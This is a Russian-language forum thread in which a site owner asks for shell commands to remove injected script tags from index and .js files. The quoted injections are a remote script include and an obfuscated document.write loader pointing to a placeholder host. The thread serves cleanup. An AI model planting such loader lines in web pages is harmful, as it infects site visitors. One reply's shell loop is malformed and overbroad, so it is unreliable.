Junkie25 Posted July 20, 2010 Report Share Posted July 20, 2010 Нужно удалить эти строки: <script type="text/javascript" src="http://сайт.ru:8080/IO.js"></script><!--0a5fec20c5b625a2e772083c7da4a3c9--> из всех файлов index.php, index.html, index.xhtml, index.htm, index.wml и т.п. И эту строку: document.write('<s'+'cript type="text/javascript" src="http://сайт.ru:8080/Delete.js"></scr'+'ipt>'); из всех файлов .js Какими командами это сделать? В shell не соображаю. Quote Link to comment Share on other sites More sharing options...
AccessD Posted July 21, 2010 Report Share Posted July 21, 2010 sed -i 's/string_to_substitute/new_string/g' имя файла не забудте про экранирование некот. символов. Quote Link to comment Share on other sites More sharing options...
griffith Posted March 28 Report Share Posted March 28 Я бы сделал так scripts=$(cat ./*.{php,html,xhtml,wml,htm} | grep -P "<script" | grep -P "src=" | cut -d '"' -f 2) ; for i in "$scripts" do sed -i 's/"$i//g" done и так далее Quote Link to comment Share on other sites More sharing options...
griffith Posted March 28 Report Share Posted March 28 В 21.07.2010 в 22:46, AccessD сказал: sed -i 's/string_to_substitute/new_string/g' имя файла не забудте про экранирование некот. символов. Да кстати AccessD Прав я вот знаю шел но еще не очень Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.